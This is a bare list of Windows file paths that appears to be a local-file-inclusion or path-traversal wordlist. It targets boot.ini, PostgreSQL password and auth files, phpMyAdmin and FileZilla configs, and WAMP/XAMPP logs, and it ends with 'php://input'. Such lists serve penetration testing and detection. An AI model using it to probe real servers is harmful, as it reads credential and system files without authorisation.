c:/boot.ini
c:/etc/postgresql/pg_hba.conf
c:/etc/postgresql/postgresql.conf
c:/home/bin/stable/apache/php.ini
c:/home/postgres/data/PG_VERSION
c:/home/postgres/data/pg_hba.conf
c:/home/postgres/data/pg_ident.conf
c:/home/postgres/data/postgresql.conf
c:/home2/bin/stable/apache/php.ini
c:/mysql/bin/my.ini
c:/php/php.ini
c:/php4/php.ini
c:/php5/php.ini
c:/usr/internet/pgsql/data/pg_hba.conf
c:/usr/local/pgsql/bin/pg_passwd
c:/usr/local/pgsql/data/passwd
c:/usr/local/pgsql/data/pg_hba.conf
c:/usr/local/pgsql/data/postgresql.conf
c:/var/lib/pgsql/data/postgresql.conf
c:/var/log/lighttpd/{DOMAIN}/access.log
c:/var/nm2/postgresql.conf
c:/var/postgresql/db/postgresql.conf
c:/wamp/bin/apache/apache2.2.21/conf/httpd.conf
c:/wamp/bin/apache/apache2.2.21/logs/access.log
c:/wamp/bin/apache/apache2.2.21/logs/error.log
c:/wamp/bin/apache/apache2.2.21/wampserver.conf
c:/wamp/bin/apache/apache2.2.22/conf/httpd.conf
c:/wamp/bin/apache/apache2.2.22/conf/wampserver.conf
c:/wamp/bin/apache/apache2.2.22/logs/access.log
c:/wamp/bin/apache/apache2.2.22/logs/error.log
c:/wamp/bin/apache/apache2.2.22/wampserver.conf
c:/wamp/bin/mysql/mysql5.5.16/data/mysql-bin.index
c:/wamp/bin/mysql/mysql5.5.16/my.ini
c:/wamp/bin/mysql/mysql5.5.16/wampserver.conf
c:/wamp/bin/mysql/mysql5.5.24/data/mysql-bin.index
c:/wamp/bin/mysql/mysql5.5.24/my.ini
c:/wamp/bin/mysql/mysql5.5.24/wampserver.conf
c:/wamp/bin/php/php5.3.8/php.ini
c:/wamp/bin/php/php5.4.3/php.ini
c:/wamp/logs/access.log
c:/wamp/logs/apache_error.log
c:/wamp/logs/genquery.log
c:/wamp/logs/mysql.log
c:/wamp/logs/slowquery.log
c:/xampp/FileZillaFTP/FileZilla Server.xml
c:/xampp/MercuryMail/mercury.ini
c:/xampp/apache/bin/php.ini
c:/xampp/apache/conf/httpd.conf
c:/xampp/apache/logs/access.log
c:/xampp/apache/logs/error.log
c:/xampp/htdocs/aca.txt
c:/xampp/htdocs/admin.php
c:/xampp/htdocs/leer.txt
c:/xampp/mysql/data/mysql-bin.index
c:/xampp/mysql/data/mysql.err
c:/xampp/mysql/data/{IPDELHOST}.err
c:/xampp/php/php.ini
c:/xampp/phpMyAdmin/config.inc.php
c:/xampp/sendmail/sendmail.ini
c:/xampp/sendmail/sendmail.log
c:/xampp/webalizer/webalizer.conf
php://input